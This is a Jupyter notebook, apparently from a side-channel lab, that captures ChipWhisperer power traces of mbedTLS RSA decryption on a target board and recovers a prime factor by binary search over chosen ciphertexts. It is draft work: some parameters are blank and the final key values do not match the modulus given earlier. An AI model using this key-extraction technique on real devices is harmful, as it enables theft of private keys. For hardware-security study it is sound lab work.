### Setup

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
CRYPTO_TARGET = 'MBEDTLS'

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../../hardware/victims/firmware/simpleserial-rsa
#make clean PLATFORM=$1 CRYPTO_TARGET=$2
make PLATFORM=$1 CRYPTO_TARGET=$2 

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = '../../../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-CWLITEXMEGA.hex'

In [ ]:
cw.program_target(scope, prog, fw_path)

In [ ]:
import numpy as np
import time 
import matplotlib.pylab as plt
import matplotlib

In [ ]:
e = 65537
n = 52270967183635299110959169812507925945033892524340745668343932985606720718177

### find numbers

In [ ]:
def find_valid_msgs(p, q, e, n, max_msg):
    valid_msgs = []
    for msg in range(1, max_msg + 1):  # Iterate through possible msg values
        x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) < 0:  # Check the condition
            valid_msgs.append(msg)
    return valid_msgs

# Parameters
p = 
q = 
max_msg = 10000  # Set a range for msg (you can adjust this range)

# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

#### some valid messages
2, 3, 7, 8, 10, 12, 13, 14, 15, 16, 18, 19, 21, 29, 31, 33, 34, 38, 40, 41, 42, 44, 46, 48, 49, 50, 51, 52, 55, 56, 59, 61, 62, 63, 64, 66, 70, 75, 76, 77, 78, 80, 81, 82, 83, 84, 85, 86, 87, 89, 92, 98, 99, 100, 103, 104, 105, 106, 107, 109, 110, 111, 115, 116, 119, 120, 121, 122, 124, 126, 127, 128, 132, 133, 136, 137, 140, 141, 142, 144, 147, 148, 149, 152, 153, 156, 157, 166, 173, 175, 179, 180, 181, 182, 184, 185, 191, 192, 193, 195, 196, 197, 200, 201, 206, 207, 210, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 225, 226, 227, 229, 231, 232, 237,806, 807, 808, 818, 820, 823, 828, 829, 830, 831, 838, 841, 843, 844, 846, 848, 849, 852, 853, 857, 860, 866, 869, 870, 873, 876, 877, 878, 880, 883, 884, 886, 887, 893, 895, 896, 901, 903, 905, 906, 907, 908, 911, 912, 913, 915, 916, 918, 922, 923, 925, 926, 929, 933, 934, 935, 936, 938, 940, 943, 944, 945, 948, 949, 950, 951, 958, 959, 961, 962, 963, 965, 966, 969, 970, 971, 975, 976, 977, 979, 981, 982, 983, 988, 989, 990, 991, 992, 996, 997, 999, 1000, 1001, 1003, 1007, 1009, 1010, 1015, 1016, 1019, 1020, 1022, 1026, 1029, 1037, 1040, 1041, 1042, 1044, 1045, 1051, 1055, 1056, 1057, 1061, 1062, 1064, 1065, 1066, 1067, 1069, 1070, 1071, 1073, 1075, 1081, 1082, 1083, 1084, 1085, 1087, 1088, 1089, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103, 1104, 1107, 1108, 1112, 1113, 1119, 1120, 1124, 1125, 1126, 1127, 1128, 1131, 1133, 1137, 1139, 1141, 1142, 1146, 1147, 1148, 1149, 1155, 1158, 1160, 1162, 1167, 1168, 1171, 1172, 1175, 1177, 117

In [ ]:
def find_valid_msgs(p, q, e, n, max_msg):
    valid_msgs = []
    for msg in range(1, max_msg + 1):  # Iterate through possible msg values
        x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) > 0:  # Check the condition
            valid_msgs.append(msg)
    return valid_msgs

# Parameters
p =
q = 
max_msg = 1000  # Set a range for msg (you can adjust this range)

# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

### capture trace setup

In [ ]:
scope.clock.adc_src = "clkgen_x1"
scope.adc.samples = 1500

scope.adc.timeout = 50

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    scope.arm()
    target.simpleserial_write('t', text)

    # get debug output, nötig?
    #rec_str = target.read(1000, timeout=2000)
    #received_str = rec_str.replace("\\r\\n", "\n")
    #print(received_str)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    time.sleep(2)
    output = target.read(timeout=20)
    print('first: ', output.replace("\\r\\n\\z00", "\n"))
    
    target.write("1\n")
    time.sleep(0.2)
    #output += target.read(timeout=10)
    output = target.read(timeout=10) 
    print('next 48 bytes: ', output.replace("r", "").replace("\nz00","").replace("\n",""))

    target.write("2\n")
    time.sleep(0.2)
    #output += target.read(timeout=10)
    output = target.read(timeout=10) 
    print('last bytes: ', output.replace("r", "").replace("\nz00","").replace("\n",""))


    #newout = output.replace("r", "").replace("\nz00","").replace("\n","")
    #print('output: ', newout)

    if SCOPETYPE == "OPENADC":
        print('#samples: ', scope.adc.trig_count)
    
    target.simpleserial_wait_ack() #!!!!
    return scope.get_last_trace()

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    target.flush()
    scope.arm()
    target.simpleserial_write('t', text)

    # get debug output, nötig?
    #rec_str = target.read(1000, timeout=2000)
    #received_str = rec_str.replace("\\r\\n", "\n")
    #print(received_str)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    time.sleep(2)
    output = target.read(2000, timeout=200)
    print(output.replace("\\r\\n\\z00", "\n"))

    if SCOPETYPE == "OPENADC":
        print('#samples: ', scope.adc.trig_count)
    
    target.simpleserial_wait_ack() #!!!!
    return scope.get_last_trace()

### test numbers for 16 Byte prim numbers

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 1
c = (msg ** e) % n

msg2_d1 = c.to_bytes(32,'big')

print(c, msg2_d1, type(msg2_d1))

trace2_d1 = capture_RSA_trace(scope, target, msg2_d1)
plt.figure()
plt.plot(trace2_d1, 'r')



In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 54
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace1 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace1, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 8569
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace1 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace1, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 10 #A
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 1007 #3EF
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 57344
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 61440
c = (msg ** e) % n

cb = c.to_bytes(32,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')


In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 589 #245D 
c = (msg ** e) % n

msg2_d1 = c.to_bytes(32,'big')

print(c, msg2_d1, type(msg2_d1), hex(c))

trace2_d1 = capture_RSA_trace(scope, target, msg2_d1)
plt.figure()
plt.plot(trace2_d1, 'r')


### Key Reconstuction

* find plaintexts x_1 and x_2 mit diff(x_1) = 0 und diff(x_2) = 1.
* mittels binäre suche: finde x mit diff(x-1) = 0 und diff(x) = 1 -> x ist Vielfaches von p 
* ggt(x, n) = p
* x^e mod n

### Algorithmus

Reconstruction of p when its bitlength is half bitlength of n
INPUT: modulus n with the bitlength t, public exponent e.
OUTPUT: prime p such that p divides n.

t = bitlenght von n 
p,q haben bitlänge t/2

x = 2 ** (t/2)
m = x/2 

In [ ]:
# 16 Byte Primzahlen 

t = 256

# x= 2 ** (t/2) 
# m = x/2 

x = 2**128
m = x//2
l = 0

print(x, m, l)

In [ ]:

 
plt.figure()

ref_trace_msg_ = 54 # t1>t2 diff(m) = 0
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(32,'big')
trace_ = capture_RSA_trace(scope, target, msg_)


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(32,'big')
    
    trace = capture_RSA_trace(scope, target, msg)
    plt.plot(trace)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    # same: ~ 15
    # diff: ~ 70
    if diff < 45: # ähnliche -> diff(m) = 0
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        x = m
        
    m = (l + x)//2
    
    

print (x)


    

p = 14091828191315287507
q = 6353019252147394247
N = 89525655797379415138998373505682772229

q = N // p
euler = (p-1)*(q-1)

-> d durch erweiterter euklidischer algo 

In [ ]:
scope.dis()
target.dis()